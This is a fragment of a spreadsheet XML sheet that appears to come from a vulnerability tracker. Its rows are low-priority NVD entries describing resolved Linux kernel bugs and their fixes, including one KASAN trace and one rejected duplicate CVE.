      <c r="K536" s="5" t="inlineStr"/>
      <c r="L536" s="5" t="inlineStr"/>
      <c r="M536" s="5" t="inlineStr"/>
      <c r="N536" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O536" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P536" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q536" s="5" t="inlineStr"/>
      <c r="R536" s="5" t="inlineStr"/>
      <c r="S536" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
erofs: preserve LZMA decoders on resize failure
The pool-resize path frees each stream's old decoder before allocating
its replacement. If an allocation fails after some streams have already
been replaced, the failed stream is put back on the list with state ==
NULL. z_erofs_lzma_max_dictsize is still advanced as if the whole
pool had been resized.
An existing LZMA mount can select the broken stream and pass
NULL to xz_dec_microlzma_reset(). A retry at the same size also
skip another resize attempt. Since the global maximum was advanced,
thus, the invalid state is left unrepaired.
Allocate each replacement before freeing the old decoder, temporarily
retaining one old decoder during allocation. Stop at the first failure
and advance z_erofs_lzma_max_dictsize only after all streams satisfy
the request.
Record each stream's dictionary capacity so retries can skip streams
already enlarged before a partial failure.</t>
        </is>
      </c>
      <c r="T536" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97605</t>
        </is>
      </c>
    </row>
    <row r="537">
      <c r="A537" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B537" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C537" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97606</t>
        </is>
      </c>
      <c r="D537" s="5" t="inlineStr"/>
      <c r="E537" s="5" t="inlineStr"/>
      <c r="F537" s="5" t="inlineStr"/>
      <c r="G537" s="5" t="inlineStr"/>
      <c r="H537" s="5" t="inlineStr"/>
      <c r="I537" s="5" t="inlineStr"/>
      <c r="J537" s="5" t="inlineStr"/>
      <c r="K537" s="5" t="inlineStr"/>
      <c r="L537" s="5" t="inlineStr"/>
      <c r="M537" s="5" t="inlineStr"/>
      <c r="N537" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O537" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P537" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q537" s="5" t="inlineStr"/>
      <c r="R537" s="5" t="inlineStr"/>
      <c r="S537" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fs: autofs: fix memory leak in autofs_fill_super()
In autofs_fill_super(), we create a new inode using
autofs_new_ino(), however, if we fail to create root_inode,
(that is, root_inode failure path), we return -ENOMEM without
freeing the new inode(ino) that we created causing a memory leak.
Fix this by adding autofs_free_ino() to free the inode we created
in root_inode failure path before returning ENOMEM.</t>
        </is>
      </c>
      <c r="T537" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97606</t>
        </is>
      </c>
    </row>
    <row r="538">
      <c r="A538" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B538" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C538" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97607</t>
        </is>
      </c>
      <c r="D538" s="5" t="inlineStr"/>
      <c r="E538" s="5" t="inlineStr"/>
      <c r="F538" s="5" t="inlineStr"/>
      <c r="G538" s="5" t="inlineStr"/>
      <c r="H538" s="5" t="inlineStr"/>
      <c r="I538" s="5" t="inlineStr"/>
      <c r="J538" s="5" t="inlineStr"/>
      <c r="K538" s="5" t="inlineStr"/>
      <c r="L538" s="5" t="inlineStr"/>
      <c r="M538" s="5" t="inlineStr"/>
      <c r="N538" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O538" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P538" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q538" s="5" t="inlineStr"/>
      <c r="R538" s="5" t="inlineStr"/>
      <c r="S538" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
vdpa: ifcvf: Put device on unsupported feature error
Route unsupported provisioned features through the common error path after
vdpa_alloc_device() so the allocated device and adapter pointer are
released consistently.</t>
        </is>
      </c>
      <c r="T538" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97607</t>
        </is>
      </c>
    </row>
    <row r="539">
      <c r="A539" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B539" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C539" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97610</t>
        </is>
      </c>
      <c r="D539" s="5" t="inlineStr"/>
      <c r="E539" s="5" t="inlineStr"/>
      <c r="F539" s="5" t="inlineStr"/>
      <c r="G539" s="5" t="inlineStr"/>
      <c r="H539" s="5" t="inlineStr"/>
      <c r="I539" s="5" t="inlineStr"/>
      <c r="J539" s="5" t="inlineStr"/>
      <c r="K539" s="5" t="inlineStr"/>
      <c r="L539" s="5" t="inlineStr"/>
      <c r="M539" s="5" t="inlineStr"/>
      <c r="N539" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O539" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P539" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q539" s="5" t="inlineStr"/>
      <c r="R539" s="5" t="inlineStr"/>
      <c r="S539" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netfs: Fix uninitialized return value in netfs_unbuffered_write()
If preparation of the first subrequest fails,
netfs_unbuffered_write() exits its loop before ret is initialized. The
empty-iterator check can do the same.
For synchronous writes, netfs_unbuffered_write_iter_locked() may then
return an unrelated error instead of wreq-&gt;error. This is reachable
through CIFS if cifs_prepare_write() fails to reopen the file or obtain
credits.
Initialize ret to 0 so the caller returns wreq-&gt;error if no data was
written, or the number of bytes already written otherwise.
Found with Clang's -Wconditional-uninitialized.</t>
        </is>
      </c>
      <c r="T539" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97610</t>
        </is>
      </c>
    </row>
    <row r="540">
      <c r="A540" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B540" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C540" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97613</t>
        </is>
      </c>
      <c r="D540" s="5" t="inlineStr"/>
      <c r="E540" s="5" t="inlineStr"/>
      <c r="F540" s="5" t="inlineStr"/>
      <c r="G540" s="5" t="inlineStr"/>
      <c r="H540" s="5" t="inlineStr"/>
      <c r="I540" s="5" t="inlineStr"/>
      <c r="J540" s="5" t="inlineStr"/>
      <c r="K540" s="5" t="inlineStr"/>
      <c r="L540" s="5" t="inlineStr"/>
      <c r="M540" s="5" t="inlineStr"/>
      <c r="N540" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O540" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P540" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q540" s="5" t="inlineStr"/>
      <c r="R540" s="5" t="inlineStr"/>
      <c r="S540" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: mana: Reserve extra CQ slot for the fence completion CQE
The RX completion queue is sized to hold exactly one CQE per posted RX WQE.
MANA_FENCE_RQ makes hardware post an additional CQE_RX_OBJECT_FENCE after
the packet CQEs. The current sizing reserves no extra slot for it and in
rare cases, CQ has no guaranteed slot for the fence CQE when it is full of
packet CQEs. This can lead to dropping the fence completion while the
driver waits holding RTNL lock throughout the timeout duration.
Reserve one extra CQE slot for CQE_RX_OBJECT_FENCE. mana_gd_alloc_memory()
requires queue_size to be a power-of-two and at least MANA_PAGE_SIZE;
the reservation pushes cq_size past a power-of-two, so round up the CQ size
in mana_create_rxq().</t>
        </is>
      </c>
      <c r="T540" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97613</t>
        </is>
      </c>
    </row>
    <row r="541">
      <c r="A541" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B541" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C541" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97614</t>
        </is>
      </c>
      <c r="D541" s="5" t="inlineStr"/>
      <c r="E541" s="5" t="inlineStr"/>
      <c r="F541" s="5" t="inlineStr"/>
      <c r="G541" s="5" t="inlineStr"/>
      <c r="H541" s="5" t="inlineStr"/>
      <c r="I541" s="5" t="inlineStr"/>
      <c r="J541" s="5" t="inlineStr"/>
      <c r="K541" s="5" t="inlineStr"/>
      <c r="L541" s="5" t="inlineStr"/>
      <c r="M541" s="5" t="inlineStr"/>
      <c r="N541" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O541" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P541" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q541" s="5" t="inlineStr"/>
      <c r="R541" s="5" t="inlineStr"/>
      <c r="S541" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: dsa: tag_brcm: legacy FCS: request needed tailroom
The legacy FCS tagger calculates the CRC over skb-&gt;len bytes starting at
skb-&gt;data. When a nonlinear skb reaches the tagger, this reads past the
linear head into unrelated slab memory.
The tagger appends an Ethernet FCS but does not declare that tailroom. As a
result, DSA leaves NETIF_F_SG and NETIF_F_FRAGLIST enabled on the user
port, and nonlinear skbs can reach the CRC calculation.
Declare the required tailroom. DSA will then clear those features and the
networking core will linearize skbs before the tagger runs.
A KASAN-enabled dsa_loop test using this tagger reports:
  BUG: KASAN: slab-out-of-bounds in crc32_le
  Read of size 1 at addr ffff8880397086c0 by task exp/135
  Call Trace:
   crc32_le (lib/crc/crc32-main.c:38)
   brcm_leg_fcs_tag_xmit (net/dsa/tag_brcm.c:343)
   dsa_user_xmit (net/dsa/user.c:942)
   dev_hard_start_xmit (net/core/dev.c:3937)
   __dev_queue_xmit (net/core/dev.c:4926)
   packet_sendmsg (net/packet/af_packet.c:3110)
   __sys_sendto (net/socket.c:2281)
  The buggy address belongs to the object at ffff888039708400
   which belongs to the cache skbuff_small_head of size 704
  The buggy address is located 0 bytes to the right of
   allocated 704-byte region [ffff888039708400, ffff8880397086c0)</t>
        </is>
      </c>
      <c r="T541" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97614</t>
        </is>
      </c>
    </row>
    <row r="542">
      <c r="A542" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B542" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C542" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97615</t>
        </is>
      </c>
      <c r="D542" s="5" t="inlineStr"/>
      <c r="E542" s="5" t="inlineStr"/>
      <c r="F542" s="5" t="inlineStr"/>
      <c r="G542" s="5" t="inlineStr"/>
      <c r="H542" s="5" t="inlineStr"/>
      <c r="I542" s="5" t="inlineStr"/>
      <c r="J542" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K542" s="5" t="inlineStr"/>
      <c r="L542" s="5" t="inlineStr"/>
      <c r="M542" s="5" t="inlineStr"/>
      <c r="N542" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O542" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P542" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q542" s="5" t="inlineStr"/>
      <c r="R542" s="5" t="inlineStr"/>
      <c r="S542" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: bridge: use option bits for CFM/MRP frame handlers
CFM and MRP register a global br_frame_type whose hlist_node is linked
into the per-bridge frame_type_list when the first MEP/MRP instance is
created. Enabling the protocol on multiple bridges therefore inserts the
same node into multiple lists. Unregistering it on one bridge then
corrupts list state belonging to another.
These handlers can only be installed once per bridge, and they are
uncommon. Track their per-bridge enable state with net_bridge option
bits, which already live on the Rx hot cache line, and dispatch the
matching handler directly from the receive path. Check both bits
together first as an unlikely case.
Remove the generic frame_type_list and br_frame_type helpers, which
have had no other users since CFM and MRP were added. That shrinks
struct net_bridge by 8 bytes and drops the list walk from the fast
path. When neither protocol is compiled in, BR_CFM_MRP_OPTS is 0 and
the compiler prunes the branch.</t>
        </is>
      </c>
      <c r="T542" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97615</t>
        </is>
      </c>
    </row>
    <row r="543">
      <c r="A543" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B543" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C543" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97616</t>
        </is>
      </c>
      <c r="D543" s="5" t="inlineStr"/>
      <c r="E543" s="5" t="inlineStr"/>
      <c r="F543" s="5" t="inlineStr"/>
      <c r="G543" s="5" t="inlineStr"/>
      <c r="H543" s="5" t="inlineStr"/>
      <c r="I543" s="5" t="inlineStr"/>
      <c r="J543" s="5" t="inlineStr">
        <is>
          <t>tempo</t>
        </is>
      </c>
      <c r="K543" s="5" t="inlineStr"/>
      <c r="L543" s="5" t="inlineStr"/>
      <c r="M543" s="5" t="inlineStr"/>
      <c r="N543" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O543" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P543" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q543" s="5" t="inlineStr"/>
      <c r="R543" s="5" t="inlineStr"/>
      <c r="S543" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: act_api: release all action references on NEWACTION failure
When a batched RTM_NEWACTION request replaces an existing action,
tcf_idr_check_alloc() takes a temporary reference on it. If a later
action fails to initialize, tcf_action_destroy() uses strict release
semantics to clean up the actions initialized so far. For an action
bound to a filter, the strict check returns -EPERM without dropping
the temporary reference.
This error also makes tcf_action_destroy() return before releasing
subsequent entries. Any new action initialized between the bound
action and the failing entry is leaked together with its reserved
IDR slot, preventing reuse of its index.
Use tcf_idr_release() to drop each reference held by the batch without
rejecting bound actions. This allows cleanup to continue through all
initialized entries and preserves the module reference release when
an action is destroyed. Explicit action deletion and flushing retain
their separate bind-count checks.</t>
        </is>
      </c>
      <c r="T543" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97616</t>
        </is>
      </c>
    </row>
    <row r="544">
      <c r="A544" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B544" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C544" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97617</t>
        </is>
      </c>
      <c r="D544" s="5" t="inlineStr"/>
      <c r="E544" s="5" t="inlineStr"/>
      <c r="F544" s="5" t="inlineStr"/>
      <c r="G544" s="5" t="inlineStr"/>
      <c r="H544" s="5" t="inlineStr"/>
      <c r="I544" s="5" t="inlineStr"/>
      <c r="J544" s="5" t="inlineStr"/>
      <c r="K544" s="5" t="inlineStr"/>
      <c r="L544" s="5" t="inlineStr"/>
      <c r="M544" s="5" t="inlineStr"/>
      <c r="N544" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O544" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P544" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q544" s="5" t="inlineStr"/>
      <c r="R544" s="5" t="inlineStr"/>
      <c r="S544" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ring-buffer: Check resize_disabled before publishing the new subbuf order
ring_buffer_subbuf_order_set() stores the new order and only then walks
the CPUs, returning -EBUSY if any of them has resizing disabled. A user
mapped buffer has resizing disabled, and __rb_map_vma() reads
buffer-&gt;subbuf_order without buffer-&gt;mutex, so an mmap of an already
mapped CPU racing the failing order change sizes the mapping with the
new order and inserts pages past the sub-buffer into the VMA.
Check the CPUs before storing the new order.</t>
        </is>
      </c>
      <c r="T544" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97617</t>
        </is>
      </c>
    </row>
    <row r="545">
      <c r="A545" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B545" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C545" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97618</t>
        </is>
      </c>
      <c r="D545" s="5" t="inlineStr"/>
      <c r="E545" s="5" t="inlineStr"/>
      <c r="F545" s="5" t="inlineStr"/>
      <c r="G545" s="5" t="inlineStr"/>
      <c r="H545" s="5" t="inlineStr"/>
      <c r="I545" s="5" t="inlineStr"/>
      <c r="J545" s="5" t="inlineStr">
        <is>
          <t>github</t>
        </is>
      </c>
      <c r="K545" s="5" t="inlineStr"/>
      <c r="L545" s="5" t="inlineStr"/>
      <c r="M545" s="5" t="inlineStr"/>
      <c r="N545" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O545" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P545" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q545" s="5" t="inlineStr"/>
      <c r="R545" s="5" t="inlineStr"/>
      <c r="S545" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
io_uring/net: don't overconsume buffers when using MSG_TRUNC
When a recv/recvmsg is issued with MSG_TRUNC and the incoming packet is
larger than the provided buffer, the net layer returns the full length
of the packet rather than the number of bytes actually copied into the
buffer.  As a result, io_uring advances more of the provided buffer ring
than was actually filled.  Use the actual filled region size to consume
the buffer, but still return the full size to preserve MSG_TRUNC
semantics.
Take care with multishot, because that seems to already truncate the
consumption based on the available payload size.
This was reported in https://github.com/axboe/liburing/issues/1619.
[axboe: fold in size_t unsigned fix]</t>
        </is>
      </c>
      <c r="T545" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97618</t>
        </is>
      </c>
    </row>
    <row r="546">
      <c r="A546" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B546" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C546" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97619</t>
        </is>
      </c>
      <c r="D546" s="5" t="inlineStr"/>
      <c r="E546" s="5" t="inlineStr"/>
      <c r="F546" s="5" t="inlineStr"/>
      <c r="G546" s="5" t="inlineStr"/>
      <c r="H546" s="5" t="inlineStr"/>
      <c r="I546" s="5" t="inlineStr"/>
      <c r="J546" s="5" t="inlineStr"/>
      <c r="K546" s="5" t="inlineStr"/>
      <c r="L546" s="5" t="inlineStr"/>
      <c r="M546" s="5" t="inlineStr"/>
      <c r="N546" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O546" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P546" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q546" s="5" t="inlineStr"/>
      <c r="R546" s="5" t="inlineStr"/>
      <c r="S546" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
io_uring/rw: end write accounting from -&gt;ki_complete
Commit b000145e9907 moved both the fsnotify calls and the write
accounting out of the kiocb completion handler and into the
io_req_rw_complete() task_work. However, only the fsnotify part actually
needed to move as it may sleep. Ending the write accounting is just a
percpu_up_read() on the superblock writers sem.
Deferring it is a problem, because it makes dropping SB_FREEZE_WRITE
protection depend on the ring owner getting to running task_work. But
the task may be blocked in freeze_super(), causing it to never get to
that:
  task                             io-wq worker
  --------------------------------------------------------------
  io_write()
    io_kiocb_start_write()         (takes sb_writers, hidden from
                                    lockdep by __sb_writers_release)
    write_iter() -&gt; -EIOCBQUEUED
  ioctl(FS_IOC_SHUTDOWN)
    bdev_freeze()
      freeze_super()
        percpu_down_write()        &lt;- waits for the reader above
                                   io_write()
                                     kiocb_start_write()
                                       percpu_down_read()  &lt;- queued
                                                              behind the
                                                              writer
  &lt;bio completes&gt;
    io_complete_rw()
      queues io_req_rw_complete()  &lt;- never runs, task is in D state
End the write from io_complete_rw() instead, and leave only the fsnotify
calls in task_work.</t>
        </is>
      </c>
      <c r="T546" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97619</t>
        </is>
      </c>
    </row>
    <row r="547">
      <c r="A547" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B547" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C547" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97620</t>
        </is>
      </c>
      <c r="D547" s="5" t="inlineStr"/>
      <c r="E547" s="5" t="inlineStr"/>
      <c r="F547" s="5" t="inlineStr"/>
      <c r="G547" s="5" t="inlineStr"/>
      <c r="H547" s="5" t="inlineStr"/>
      <c r="I547" s="5" t="inlineStr"/>
      <c r="J547" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K547" s="5" t="inlineStr"/>
      <c r="L547" s="5" t="inlineStr"/>
      <c r="M547" s="5" t="inlineStr"/>
      <c r="N547" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O547" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P547" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q547" s="5" t="inlineStr"/>
      <c r="R547" s="5" t="inlineStr"/>
      <c r="S547" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/xe: Flush LSC untyped L1 dataport cache after rcs/ccs batches
emit_render_cache_flush() sets PIPE_CONTROL0_HDC_PIPELINE_FLUSH to
flush the L2/HDC data cache before fence signalling, but it never
requests a flush of the LSC untyped L1 data cache via the 'Untyped
Data-Port Cache Flush Enable' bit in PIPE_CONTROL DWord0[11].
Per the Bspec, in 3D pipeline mode HDC Pipeline Flush is documented to
also flush/invalidate the untyped L1 cache, but only depending on how
HDC_CHICKEN0[13:11] is programmed. Starting with MTL, this coupling
between HDC Pipeline Flush and the untyped L1 cache flush no longer
holds in practice, regardless of how HDC_CHICKEN0 is programmed, so
relying on it is not safe on newer platforms such as BMG. Mesa's Vulkan
driver (anv) has been assuming the kernel flushes both caches between
submissions, and hit user-visible corruption in apps such as Llama.cpp
because of this gap; it now works around it by flushing both caches
again from userspace at the end of every command buffer.
Correctness between submissions on the same queue is userspace's
responsibility and belongs in Mesa, not the kernel. However, for
security we must ensure stale data can't leak through the untyped L1
dataport cache once memory is reclaimed or evicted, which requires the
KMD to flush it before releasing memory for reuse.
Prior to MTL, HDC_CHICKEN0 could be programmed (as already done for
DG2 via Wa_22010960976/Wa_14013347512) to reliably keep HDC Pipeline
Flush coupled to the untyped L1 cache flush, so those platforms are
unaffected. Mesa's own anv driver found that on MTL the HW
disconnected the two independently of how HDC_CHICKEN0 is programmed,
and could not bring the old behavior back even by writing the register
by hand; see Mesa commit 7c2ff46a4fc3 ("anv: don't prevent L1 untyped
cache flush in 3D mode"). The kernel can't reliably request the flush
from the CS on MTL either, so restrict the new PIPE_CONTROL bit to
GRAPHICS_VERx100 &gt;= 2000 (Xe2 and later), where it can be relied on.
Explicitly set PIPE_CONTROL0_UNTYPED_DATAPORT_CACHE_FLUSH together
with PIPE_CONTROL0_HDC_PIPELINE_FLUSH in emit_render_cache_flush() on
Xe2 and later, so the L1 data cache is known clean before memory is
released for reuse, without depending on undocumented
platform-specific HDC_CHICKEN0 behavior.
Bspec: 56551
(cherry picked from commit 434514b6fe731e873808297c268fc52cdf4a1ce6)</t>
        </is>
      </c>
      <c r="T547" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97620</t>
        </is>
      </c>
    </row>
    <row r="548">
      <c r="A548" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B548" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C548" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97621</t>
        </is>
      </c>
      <c r="D548" s="5" t="inlineStr"/>
      <c r="E548" s="5" t="inlineStr"/>
      <c r="F548" s="5" t="inlineStr"/>
      <c r="G548" s="5" t="inlineStr"/>
      <c r="H548" s="5" t="inlineStr"/>
      <c r="I548" s="5" t="inlineStr"/>
      <c r="J548" s="5" t="inlineStr"/>
      <c r="K548" s="5" t="inlineStr"/>
      <c r="L548" s="5" t="inlineStr"/>
      <c r="M548" s="5" t="inlineStr"/>
      <c r="N548" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O548" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P548" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q548" s="5" t="inlineStr"/>
      <c r="R548" s="5" t="inlineStr"/>
      <c r="S548" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/rockchip: analogix_dp: fix unchecked bound endpoint name length
rockchip_dp_drm_encoder_enable() uses sprintf() to format a device tree
path into a 32-byte stack buffer. Device tree paths are not limited to
this size, so a sufficiently long path can overflow the buffer.
Use snprintf() with the destination size to truncate the generated name
and keep the writes within bounds.</t>
        </is>
      </c>
      <c r="T548" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97621</t>
        </is>
      </c>
    </row>
    <row r="549">
      <c r="A549" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B549" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C549" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97622</t>
        </is>
      </c>
      <c r="D549" s="5" t="inlineStr"/>
      <c r="E549" s="5" t="inlineStr"/>
      <c r="F549" s="5" t="inlineStr"/>
      <c r="G549" s="5" t="inlineStr"/>
      <c r="H549" s="5" t="inlineStr"/>
      <c r="I549" s="5" t="inlineStr"/>
      <c r="J549" s="5" t="inlineStr"/>
      <c r="K549" s="5" t="inlineStr"/>
      <c r="L549" s="5" t="inlineStr"/>
      <c r="M549" s="5" t="inlineStr"/>
      <c r="N549" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O549" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P549" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q549" s="5" t="inlineStr"/>
      <c r="R549" s="5" t="inlineStr"/>
      <c r="S549" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2026-62062. Reason: This candidate is a reservation duplicate of CVE-2026-62062. Notes: All CVE users should reference CVE-2026-62062 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage.</t>
        </is>
      </c>
      <c r="T549" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97622</t>
        </is>
      </c>
    </row>
    <row r="550">
      <c r="A550" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B550" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C550" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97899</t>
        </is>
      </c>
      <c r="D550" s="5" t="inlineStr"/>
      <c r="E550" s="5" t="inlineStr"/>
      <c r="F550" s="5" t="inlineStr"/>
      <c r="G550" s="5" t="inlineStr"/>
      <c r="H550" s="5" t="inlineStr"/>
      <c r="I550" s="5" t="inlineStr"/>
      <c r="J550" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K550" s="5" t="inlineStr"/>
